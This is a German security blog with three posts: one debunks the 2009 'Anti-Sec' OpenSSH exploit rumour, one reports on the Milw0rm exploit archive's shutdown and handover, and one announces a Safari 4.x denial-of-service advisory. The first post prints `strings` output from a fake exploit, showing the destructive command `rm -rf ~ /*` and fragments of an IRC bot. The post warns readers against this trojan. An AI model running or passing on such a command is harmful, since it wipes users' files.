Anti-Security Movement
Es begann mit einer Email, welche den Einbruch in die Webseite Astalavista.com zu beweisen schien. Es folgten zwei weitere Einbrüche in Server, darunter der absolut medienwirksame Angriff auf ImageShack.us. Alles weitere waren Gerüchte, um einen angeblichen OpenSSH Exploit, die auf der Mailingliste Full-Disclosure bis zum heutigen Tag am Leben erhalten werden. Das Resultat: Angst!
Nun ist ein weiteres Schreiben aufgetaucht. Die Glaubwürdigkeit geht gegen Null, denn die Absender wechseln permanent; zum Beispiel:
- srshaxsir at hushmail.com
- rxxayywzzr at hush.ai
- anti.sec.movement at gmail.com
- anti.sec.move at gmail.com
- antisec at hushmail.com
Die neueste Email ist mit dem Datum "Mon Jul 20 07:32:18 BST 2009" versehen und kündigt an den Exploit binnen 48 Stunden zu veröffentlichen und so eine Welle von Einbrüchen zu verursachen. Dazu sollte zweierlei gesagt werden: Der Absender ist - mit an Sicherheit grenzender Wahrscheinlichkeit - ein Trittbrettfahrer und zweitens ist derartiger Code bereits aufgetaucht. Ist meine Kristallkugel noch funktional, so wird es sich um dieses C Programm handeln. Doch dazu sagen ein paar Unix Kommandos mehr als tausend Worte:
$ gcc -o exploit exploit.c && chmod a-x exploit $ strings exploit [...] rm -rf ~ /* 2> /dev/null & [...] #!/usr/bin/perl $chan="#cn";$key ="fags";$nick="k\n";}}print $sock "JOIN[...]
Einige Leute haben es bereits geschafft die Warnung "DO NOT RUN!!!" zu ignorieren und ihr eigenes System zu schädigen; daher sehe ich von dem Veröffentlichen solchen Programmcodes ab.
So bleibt zu sagen: Hoffentlich hört diese zu mittlerweile großen Teilen aus Lügen geschaffene Panik bald auf, an der nicht zuletzt auch schlecht recherchierte Einträge von "Massenmedien" Schuld tragen.
Milw0rm: Schreie und ihr Echo
Das Geschrei war riesig als das auf Full Disclosure angelegte Exploit Portal Milw0rm vom Netz ging. Zum Hintergrund: Über lange Zeit wurde Milw0rm von einer einzigen Person namens str0ke betrieben, welcher dafür sorgte, dass viele tausend Menschen stets aktuelle Informationen rund um Schwachstellen erhalten konnten. So erklärt sich dann auch folgende Meldung, die morgens meinen Bildschirm verdunkelte:
For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of. 0 to 72 hours isn't fair to the (exploit) authors on this site.
Wirklich verübeln konnte ihm das niemand, denn jeder konnte sich selbst ausmalen welch Arbeit es ist, etwas in dieser Größenordnung zu betreiben. Dementsprechend waren viele Blogs voll von einer Mischung aus Lob und Trauer. Einige beschränkten sich jedoch allein auf panisches Schreien ("Milw0rm ist weg!").
Die reichlichen positiven Rückmeldungen jedoch führten bei str0ke zu folgendem Entschluss, den er über Twitter bekannt gab:
I have talked with a few friends and I'll be handing the site over so a group of people can add exploits / other things to the site. Hopefully it will be a new good start
Ergebnis: Die Seite ist online. Neue Exploits sind verfügbar. Die Zukunft scheint gesichert.
Und wieder einmal zeigt sich, dass man nicht immer (vor)schnell und laut schreien sollte. Abstand zu Emotionen gewinnen und die Nähe von Rationalität suchen, kann Wunder wirken.
Advisory: Apple Safari 4.x DoS
Ähnlich der alten Seite Wired-Security.net gibt es nun auch unter der neuen Domain das erste Advisory, welches (wie der Titel unschwer vermuten lässt) diesmal jedoch keine Webapplikation betrifft, sondern den Browser von Apple in der Version 4.
Die Analyse des Fehlers wurde in Kooperation mit meinem Kollegen und guten Bekannten Achim Hoffmann realisiert und nun als "Geschenk" zum Start des neuen Monats veröffentlicht. Apple wurde über das Problem vor einiger Zeit unterrichtet, hatte jedoch an weiteren Informationen unsererseits kein Interesse.
Um den Crash zu provozieren bedarf es drei Voraussetzungen:
- Eine JavaScript Datei muss extern eingebunden werden
- Mittels einer Try-Catch Anweisung in JS muss ein Popup aufgerufen werden
- Es muss zu einem Reload der Seite kommen
Das endgültige Advisory befindet sich auf der Seite "Index" unter:
Apple Safari 4.x JavaScript Reload Denial of Service | txt
Achtung: Bei nicht betroffenen Browsern führt die Demo Seite zu einer Endlosschleife!
Abschließend sei gesagt, dass jeder Interessierte dazu eingeladen ist weitere Nachforschungen bezüglich dieser Schwachstelle anzustellen.
Post Scriptum: Die Safari Applikation des iPhone ist nicht betroffen.
